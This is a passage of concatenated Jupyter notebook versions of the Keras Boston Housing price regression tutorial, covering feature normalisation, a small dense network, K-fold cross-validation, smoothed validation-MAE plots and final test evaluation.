val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
import numpy as np
np.max(train_targets)
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
a = np.array([[[1, 2], [3, 4]],
[[1, 2], [3, 4]]])
np.mean(a, axis=2)
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
np.concatenate(([1,2],[3,4]))
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
len(all_mae_histories[0])
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.99):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
np.argmin(smooth_mae_history)
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=np.argmin(smooth_mae_history)+1, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
train_data[0]
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets[:10]
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
mean
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 2
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
%%time
from keras import backend as K
# Some memory clean-up
K.clear_session()
#%%time
import numpy as np
num_epochs = 500
all_mae_histories = []
k = 2
num_val_samples = len(train_data) // k
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
history.history.keys()
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression example* The previous examples were __classification__ problems, where the goal was to predict a single discrete label of an input data point. * This problem is __"regression"__, which consists of predicting a continuous value instead of a discrete label. > * For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.* __NOTE:__ Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price dataset* We will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.* The dataset has an interesting difference from previous examples: it has very few data points> * Only 506 data points in total> * Split between 404 training samples and 102 test samples> * Each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. >> * For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \\$10,000 and \\$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the data* It would be problematic to feed into a neural network values that all take wildly different ranges. > * The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. * A widespread best practice to deal with such data is to do `feature-wise normalization`: > * Ror each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation> * The feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
* __Note:__ The quantities that we use for normalizing the test data have been computed using the training data. * __Best Practice:__ never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our network* Because so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. * In general, the less training data you have, the worse overfitting will be> * Using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Understanding the Network* The network ends with a single unit, and no activation (i.e. it will be linear layer)* This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). > * Applying an activation function would constrain the range that the output can take> * for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. > * As the last layer is purely linear, the network is free to learn to predict values in any range.* Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.* We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. > * It is the absolute value of the difference between the predictions and the targets. > * For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \\$500 on average. Validating our approach using K-fold validation* To evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a __training__ set and a __validation__ set, as we were doing in our previous examples. * Because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). * A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, > * i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.* __Best practice__ in such situations is to use K-fold cross-validation. > * It consists of splitting the available data into K partitions (typically K=4 or 5)> * Then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. > * The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
* The different runs do indeed show rather different validation scores, from 2.1 to 2.9. * Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. * In this case, we are off by \\$2,400 on average, which is still significant considering that the prices range from \\$10,000 to \\$50,000. * Next try training the network for a bit longer: 500 epochs. * To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mean_absolute_error']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
